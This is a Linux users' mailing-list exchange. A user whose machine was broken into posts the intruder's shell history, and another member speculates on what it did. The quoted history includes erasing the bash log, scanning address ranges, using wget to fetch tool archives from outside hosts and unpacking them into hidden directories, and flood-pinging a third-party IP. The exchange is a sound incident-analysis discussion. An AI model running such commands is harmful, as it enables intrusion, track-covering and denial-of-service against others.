Looks like you've got Romanian script kiddies in your computer. Well, they have stuff stashed on Romanian servers anyway. I'm curious about this stuff myself. I guess bot.tgz is a program that flood pings 203.144.243.10 (Asahi-Somboon ONLINE?) What's bios.tgz? And what are the scan and serv commands doing with those IP addresses? Hmmm? > I think I have found the answer to my problems. I got into a shell using > disc 1 of the installation cds. I switched to super user mode and saw > various commands in the history that were not mine. Someone got in earlier > this week and did some bad things to my system. Below is the history if > anyone is interested in seeing what they were up to. Any explanation of > what they did is welcome. It was pretty much a fresh install, so I wiped > the disc and I am reinstalling. I think I need to learn much more about > security. > > TOm > > > > > > > history > rm -rf .bash_history > ls -al > w > cd /tmp/.cfg/ > cd samba > ./scan 217 139 97 1 > ./scan 62 139 217 98 > ./serv 67.160.4.66 > ./scan 67 139 160 4 > ./scan 217 139 0 1 > ls -alF > cat /etc/issue > tar > cd /tmp > cd sh > ls -alF > tar -xzvf sh.tgz > exit > id > wget djcc.go.ro/bios.tgz > tar -xzvf bios.tgz > tar -xzvf bios.tgz > ls > rm -rf bios.tgz > ls > ps -aux > cat /proc/cpuinfo > exit > chmod 700 inst > chmod +x inst > exit > mkdir /dev/targa > cd /dev/targa > wget mihai-doini.org/bot.tgz > tar -xzvf bot.tgz > exit > ping -s -f 203.144.243.10 65500& > ping -f -s 203.144.243.10 65500& > ping -s -f 203.144.243.10 65500& > ls > cd / > ping -s -f 203.144.243.10 65500& > history | more > history | vim > history -w /tmp/hist.txt > > > > _______________________________________________ > TCLUG Mailing List - Minneapolis/St. Paul, Minnesota > http://www.mn-linux.org tclug-list at mn-linux.org > https://mailman.real-time.com/mailman/listinfo/tclug-list _______________________________________________ TCLUG Mailing List - Minneapolis/St. Paul, Minnesota http://www.mn-linux.org tclug-list at mn-linux.org https://mailman.real-time.com/mailman/listinfo/tclug-list